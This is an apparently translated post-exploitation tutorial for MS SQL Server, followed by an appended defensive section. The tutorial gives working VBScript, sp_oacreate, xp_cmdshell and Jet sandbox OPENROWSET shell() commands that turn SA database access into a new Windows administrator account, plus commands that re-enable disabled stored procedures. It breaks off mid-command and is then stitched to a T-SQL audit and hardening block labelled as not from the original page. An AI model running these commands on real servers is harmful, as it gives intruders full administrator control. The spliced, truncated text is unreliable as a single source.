With access through the SA password, an administrator account often cannot be added, because the server administrator, or a "predecessor", has restricted the use of net.exe and net1.exe. VBS has a WinNT object in its Active Directory (ADSI) section that is used to manage local resources; with it an administrator can be added without relying on CMD commands. The specific code:
Set wsnetwork = CreateObject("WSCRIPT.NETWORK")
os = "WinNT://" & wsnetwork.ComputerName
Set ob = GetObject(os) ' get the ADSI interface and bind to it
Set oe = GetObject(os & "/Administrators,group") ' the Administrators group
Set od = ob.Create("user", "test") ' create the user
od.SetPassword "1234" ' set the password
od.SetInfo ' save
Set of = GetObject(os & "/test", user) ' get the user
oe.add os & "/test"
Save the code above as 1.vbs and run it with the command "cscript 1.vbs"; the system then gains a user named test with the password 1234. The same thing is done in Query Analyzer as follows:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set wsnetwork = CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'os = "WinNT://" & wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set ob = GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set oe = GetObject(os & "/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set od = ob.Create("user", "test")'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set of = GetObject(os & "/test", user)'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'oe.add os & "/test"'
After running the statements above, execute the following line. It must be run separately, not together with the statements above; otherwise the message "c:\1.vbs is run by another program" appears and the user is not added:
exec master..xp_cmdshell 'cscript c:\1.vbs'
If the user was not added successfully, it may be because the password 1234 is too simple and does not meet the server's password complexity policy; set a more complex one and test again. The 1.vbs code can also be written with echo, in this format:
exec master..xp_cmdshell 'echo set wsnetwork = CreateObject("WSCRIPT.NETWORK") >> 1.vbs'
However, I do not understand why none of the command lines containing the "&" character can be written to 1.vbs; interested readers can try to work it out.
Jet sandbox mode gets around the trouble with xp_cmdshell, the other stored procedures and their related dynamic link libraries. For security reasons the system does not open sandbox mode by default, so xp_regwrite is needed to open it:
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1
Then run the sandbox commands; the system adds a user named test with the password 1234:
select * from openrowset('microsoft.jet.oledb.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net user test 1234 /add")')
select * from openrowset('microsoft.jet.oledb.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net localgroup administrators test /add")')
The path differs between operating systems and must be changed to suit:
NT/2K: c:\winnt\system32
XP/2003: c:\windows\system32
In addition, Microsoft SQL Server 2005 has a number of stored procedures closed by default, and a command is required to open them:
Open xp_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Open 'OPENROWSET':
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE;
Open 'sp_oacreate':
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp
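The settings this page changes (xp_cmdshell, ad hoc OPENROWSET, sp_oacreate and the Jet SandBoxMode value) can be audited and switched back off from the same query window. The T-SQL below is an added example, not code from the original page; it assumes SQL Server 2005 or later and a sysadmin login, and it uses xp_regread and the 'Ole Automation Procedures' option name, neither of which appears on the page.

```sql
-- Added example (not from the original page): audit, then harden, the
-- SQL Server features the techniques above depend on. SQL Server 2005+.
SET NOCOUNT ON;

-- 1. Surface-area options. value_in_use = 1 means the feature is live now.
SELECT name,
       CAST(value_in_use AS int) AS value_in_use,
       CASE CAST(value_in_use AS int)
            WHEN 1 THEN 'ENABLED: disable unless a documented job needs it'
            ELSE 'disabled'
       END AS finding
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',   -- gates sp_oacreate / sp_oamethod
               'Ad Hoc Distributed Queries')  -- gates ad hoc OPENROWSET
ORDER BY name;

-- 2. Jet SandBoxMode. 2 is the Jet default; 0 or 1 lets a non-Access host
--    such as OPENROWSET evaluate shell(). NULL means the value could not be
--    read (on 64-bit Windows the 32-bit Jet key sits under SOFTWARE\Wow6432Node).
DECLARE @sandbox int;
EXEC master.dbo.xp_regread
     'HKEY_LOCAL_MACHINE',
     'SOFTWARE\Microsoft\Jet\4.0\Engines',
     'SandBoxMode',
     @sandbox OUTPUT;
SELECT @sandbox AS SandBoxMode,
       CASE WHEN @sandbox IN (0, 1) THEN 'WEAKENED: restore to 2 or 3'
            WHEN @sandbox IS NULL   THEN 'not read: check the Wow6432Node path'
            ELSE 'ok'
       END AS finding;

-- 3. The page assumes SA-level access, so list who holds sysadmin
--    and whether each of those logins (sa included) is enabled.
SELECT p.name, p.type_desc, p.is_disabled
FROM sys.server_principals AS p
JOIN sys.server_role_members AS rm ON rm.member_principal_id = p.principal_id
JOIN sys.server_principals AS r   ON r.principal_id = rm.role_principal_id
WHERE r.name = 'sysadmin';

-- 4. Hardening: turn the three options back off (run as sysadmin).
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
```

An option that reads as enabled again after step 4, or a SandBoxMode value that has moved away from 2, is worth treating as an indicator that someone with sysadmin rights has been reconfiguring the instance.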